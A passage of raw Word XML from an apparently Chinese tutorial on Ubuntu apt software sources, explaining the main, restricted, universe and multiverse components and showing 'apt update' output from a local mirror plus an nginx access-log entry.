        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>表示软件包组件类别，是由技术支持程度不同而划分的类别，可选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>restricted</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>universe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>multiverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>中的一种或多种。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>main:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>完全的自由软件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>restricted:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>不完全的自由软件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>universe:ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>官方不提供支持与补丁，全靠社区支持。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>muitiverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>：非自由软件，完全不提供支持和补丁。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D54C6" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>软件源配置文件只是告知系统可以访问的镜像站点地址，但那些镜像站点具体都拥有什么软件资源并不清楚。若每安装一个软件包，就在服务器上寻找一遍，效率是很低的。因而镜像源提供了索引文件，以便本地主机查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:eastAsia="宋体" w:hAnsi="Inconsolata" w:cs="宋体"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>apt update</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>即更新索引文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA0E30" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>root@aurora-rsync:/home/aurora</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="708090"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t># apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F349D" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Get:1 http://mirrors.szu.moe/ubuntu jammy InRelease </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>270 kB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2111A" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Hit:2 http://mirrors.szu.moe/ubuntu jammy-updates InRelease</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6D06A" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Hit:3 http://mirrors.szu.moe/ubuntu jammy-backports InRelease</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71662E4C" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Hit:4 http://mirrors.szu.moe/ubuntu jammy-security InRelease</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B17DC" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Fetched 270 kB </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="0077AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1s </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>372 kB/s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F55AC" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Reading package lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>. Done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A67FF9" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Building dependency tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>. Done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79886126" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Reading state information</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>. Done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003EC04" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>root@aurora-rsync:/home/aurora</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="708090"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t># cat /var/log/nginx/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181F6A6" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.239.252 - - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>13/Mar/2023:03:03:54 +0800</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"GET /ubuntu/dists/jammy/InRelease HTTP/1.1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200 270087 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"-"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"Debian APT-HTTP/1.3 (2.4.8) non-interactive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E003B0" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
